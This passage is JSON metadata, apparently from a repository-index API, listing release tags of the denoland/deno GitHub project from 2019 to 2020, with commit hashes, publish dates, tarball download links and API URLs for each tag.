o/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F